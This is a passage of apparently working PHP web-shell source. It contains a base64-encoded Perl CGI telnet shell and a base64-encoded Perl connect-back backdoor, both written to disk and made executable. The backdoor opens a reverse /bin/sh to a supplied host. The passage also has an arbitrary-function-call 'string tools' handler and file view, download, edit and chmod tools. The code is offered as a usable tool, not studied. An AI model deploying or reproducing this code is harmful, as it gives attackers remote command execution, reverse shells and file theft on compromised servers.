  1775. dXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAi
  1776. IHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFu
  1777. ZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRf
  1778. XG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29t
  1779. bWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdp
  1780. bk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlBy
  1781. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0t
  1782. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1783. LS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQg
  1784. Y29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUg
  1785. c3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMg
  1786. ZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1l
  1787. bnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2Fk
  1788. ZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1789. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsN
  1790. Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBl
  1791. eGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8g
  1792. dGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJI
  1793. KiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2Fk
  1794. JmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlW
  1795. PVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmlu
  1796. dFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCg0KU2VuZGluZyBGaWxl
  1797. ICRUcmFuc2ZlckZpbGUuLi48YnI+DQpJZiB0aGUgZG93bmxvYWQgZG9lcyBub3Qgc3RhcnQgYXV0
  1798. b21hdGljYWxseSwNCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lg0KRU5E
  1799. DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0N
  1800. CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7
  1801. DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJlByaW50Rmls
  1802. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0t
  1803. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1804. LS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJv
  1805. bSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2Fu
  1806. IGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmll
  1807. ZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0t
  1808. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1809. LQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOw0KCWlm
  1810. KG9wZW4oU0VOREZJTEUsICRTZW5kRmlsZSkpICMgZmlsZSBvcGVuZWQgZm9yIHJlYWRpbmcNCgl7
  1811. DQoJCWlmKCRXaW5OVCkNCgkJew0KCQkJYmlubW9kZShTRU5ERklMRSk7DQoJCQliaW5tb2RlKFNU
  1812. RE9VVCk7DQoJCX0NCgkJJEZpbGVTaXplID0gKHN0YXQoJFNlbmRGaWxlKSlbN107DQoJCSgkRmls
  1813. ZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsNCgkJcHJpbnQgIkNvbnRlbnQt
  1814. VHlwZTogYXBwbGljYXRpb24veC11bmtub3duXG4iOw0KCQlwcmludCAiQ29udGVudC1MZW5ndGg6
  1815. ICRGaWxlU2l6ZVxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7
  1816. IGZpbGVuYW1lPSQxXG5cbiI7DQoJCXByaW50IHdoaWxlKDxTRU5ERklMRT4pOw0KCQljbG9zZShT
  1817. RU5ERklMRSk7DQoJfQ0KCWVsc2UgIyBmYWlsZWQgdG8gb3BlbiBmaWxlDQoJew0KCQkmUHJpbnRQ
  1818. YWdlSGVhZGVyKCJmIik7DQoJCXByaW50ICJGYWlsZWQgdG8gZG93bmxvYWQgJFNlbmRGaWxlOiAk
  1819. ISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9
  1820. DQp9DQoNCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1821. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxl
  1822. ZCB3aGVuIHRoZSB1c2VyIGRvd25sb2FkcyBhIGZpbGUuIEl0IGRpc3BsYXlzIGEgbWVzc2FnZQ0K
  1823. IyB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rIHRocm91Z2ggd2hpY2ggdGhlIGZpbGUg
  1824. Y2FuIGJlIGRvd25sb2FkZWQuDQojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0
  1825. aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsDQojIHRoZSBmaWxlIGlz
  1826. IHJlYWQgYW5kIHNlbnQgdG8gdGhlIGJyb3dzZXIuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1827. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
  1828. dWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBm
  1829. aWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9e
  1830. XFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBw
  1831. YXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0K
  1832. CWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFy
  1833. Z2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAk
  1834. UGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2Ug
  1835. aGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZp
  1836. bGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsN
  1837. CgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0t
  1838. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1839. LS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIg
  1840. d2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwg
  1841. aXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxl
  1842. LCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0t
  1843. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1844. LS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwg
  1845. cHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7
  1846. DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQ
  1847. cmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0K
  1848. DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiVXBsb2FkaW5nICRUcmFu
  1849. c2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVh
  1850. bGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXRO
  1851. YW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJh
  1852. bnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQx
  1853. Ow0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0
  1854. aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJ
  1855. aWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmlu
  1856. dCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgll
  1857. bHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRU
  1858. YXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJ
  1859. cHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsN
  1860. CgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXBy
  1861. aW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlw
  1862. cmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICIiOw0KCSZQcmludENvbW1h
  1863. bmRMaW5lSW5wdXRGb3JtOw0KDQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0t
  1864. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1865. LS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRz
  1866. IHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQs
  1867. IGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmls
  1868. ZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlk
  1869. ZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0K
  1870. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1871. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmls
  1872. ZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5z
  1873. ZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50Rmls
  1874. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkj
  1875. IGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJ
  1876. aWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5U
  1877. ICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJ
  1878. JFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2
  1879. ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikg
  1880. PX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsN
  1881. Cgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0K
  1882. CXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhh
  1883. dmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1Bh
  1884. Z2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1885. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWlu
  1886. IFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1887. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
  1888. CiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NS
  1889. SVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBh
  1890. c3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmls
  1891. ZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9
  1892. Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNp
  1893. ZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29t
  1894. bWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1
  1895. cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZElu
  1896. ID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJs
  1897. b2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJm
  1898. b3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMg
  1899. dG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24g
  1900. ZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZp
  1901. bGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3du
  1902. bG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9n
  1903. b3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==';
  1904.                                                                     $file = fopen("izo.cin", "w+");
  1905.                                                                     $write = fwrite($file, base64_decode($cgishellizocin));
  1906.                                                                     fclose($file);
  1907.                                                                     chmod("izo.cin", 0755);
  1908.                                                                     $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
  1909. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
  1910. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
  1911. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
  1912. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
  1913. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
  1914. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
  1915. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
  1916. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
  1917. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
  1918. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
  1919. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
  1920. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
  1921. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
  1922. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
  1923. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
  1924. YXRhY2hlZFxuXG4iOw==';
  1925.                                                                     $file = fopen("dc.pl", "w+");
  1926.                                                                     $write = fwrite($file, base64_decode($netcatshell));
  1927.                                                                     fclose($file);
  1928.                                                                     chmod("dc.pl", 0755);
  1929.                                                                     echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe> ";
  1930.                                                                     echo '</div>';
  1931.                                                                     printFooter();
  1932.                                                                 }
  1933.  
  1934. function actionStringTools() {
  1935.     if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  1936.     if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
  1937.     if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
  1938.     if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
  1939.     if(isset($_POST['ajax'])) {
  1940.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  1941.         ob_start();
  1942.         if(function_exists($_POST['p1']))
  1943.             echo $_POST['p1']($_POST['p2']);
  1944.         $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  1945.         echo strlen($temp), "\n", $temp;
  1946.         exit;
  1947.     }
  1948.     printHeader();
  1949.     echo '<h1>String conversions</h1><div class=content>';
  1950.     $stringTools = array(
  1951.         'Base64 encode' => 'base64_encode',
  1952.         'Base64 decode' => 'base64_decode',
  1953.         'Url encode' => 'urlencode',
  1954.         'Url decode' => 'urldecode',
  1955.         'Full urlencode' => 'full_urlencode',
  1956.         'md5 hash' => 'md5',
  1957.         'sha1 hash' => 'sha1',
  1958.         'crypt' => 'crypt',
  1959.         'CRC32' => 'crc32',
  1960.         'ASCII to HEX' => 'ascii2hex',
  1961.         'HEX to ASCII' => 'hex2ascii',
  1962.         'HEX to DEC' => 'hexdec',
  1963.         'HEX to BIN' => 'hex2bin',
  1964.         'DEC to HEX' => 'dechex',
  1965.         'DEC to BIN' => 'decbin',
  1966.         'BIN to HEX' => 'bin2hex',
  1967.         'BIN to DEC' => 'bindec',        
  1968.         'String to lower case' => 'strtolower',
  1969.         'String to upper case' => 'strtoupper',
  1970.         'Htmlspecialchars' => 'htmlspecialchars',
  1971.         'String length' => 'strlen',
  1972.     );
  1973.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  1974.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  1975.     echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
  1976.     foreach($stringTools as $k => $v)
  1977.         echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  1978.         echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
  1979.     if(!empty($_POST['p1'])) {
  1980.         if(function_exists($_POST['p1']))
  1981.         echo htmlspecialchars($_POST['p1']($_POST['p2']));
  1982.     }
  1983.     echo"</pre></div>";
  1984.     printFooter();
  1985. }
  1986. function actionFilesTools() {
  1987.     if( isset($_POST['p1']) )
  1988.         $_POST['p1'] = urldecode($_POST['p1']);
  1989.     if(@$_POST['p2']=='download') {
  1990.         if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
  1991.             ob_start("ob_gzhandler", 4096);
  1992.             header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
  1993.             if (function_exists("mime_content_type")) {
  1994.                 $type = @mime_content_type($_POST['p1']);
  1995.                 header("Content-Type: ".$type);
  1996.             }
  1997.             $fp = @fopen($_POST['p1'], "r");
  1998.             if($fp) {
  1999.                 while(!@feof($fp))
  2000.                     echo @fread($fp, 1024);
  2001.                 fclose($fp);
  2002.             }
  2003.         } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
  2004.         }
  2005.         exit;
  2006.     }
  2007.     if( @$_POST['p2'] == 'mkfile' ) {
  2008.         if(!file_exists($_POST['p1'])) {
  2009.             $fp = @fopen($_POST['p1'], 'w');
  2010.             if($fp) {
  2011.                 $_POST['p2'] = "edit";
  2012.                 fclose($fp);
  2013.             }
  2014.         }
  2015.     }
  2016.     printHeader();
  2017.     echo '<h1>File tools</h1><div class=content>';
  2018.     if( !file_exists(@$_POST['p1']) ) {
  2019.         echo 'File not exists';
  2020.         printFooter();
  2021.         return;
  2022.     }
  2023.     $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  2024.     $gid = @posix_getgrgid(@fileowner($_POST['p1']));
  2025.     echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
  2026.     echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
  2027.     if( empty($_POST['p2']) )
  2028.         $_POST['p2'] = 'view';
  2029.     if( is_file($_POST['p1']) )
  2030.         $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
  2031.     else
  2032.         $m = array('Chmod', 'Rename', 'Touch');
  2033.     foreach($m as $v)
  2034.         echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  2035.     echo '<br><br>';
  2036.     switch($_POST['p2']) {
  2037.         case 'view':
  2038.             echo '<pre class=ml1>';
  2039.             $fp = @fopen($_POST['p1'], 'r');
  2040.             if($fp) {
  2041.                 while( !@feof($fp) )
  2042.                     echo htmlspecialchars(@fread($fp, 1024));
  2043.                 @fclose($fp);
  2044.             }
  2045.             echo '</pre>';
  2046.             break;
  2047.         case 'highlight':
  2048.             if( is_readable($_POST['p1']) ) {
  2049.                 echo '<div class=ml1 style="background-color: #000;color:black;">';
  2050.                 $code = highlight_file($_POST['p1'],true);
  2051.                 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
  2052.             }
  2053.             break;
  2054.         case 'chmod':
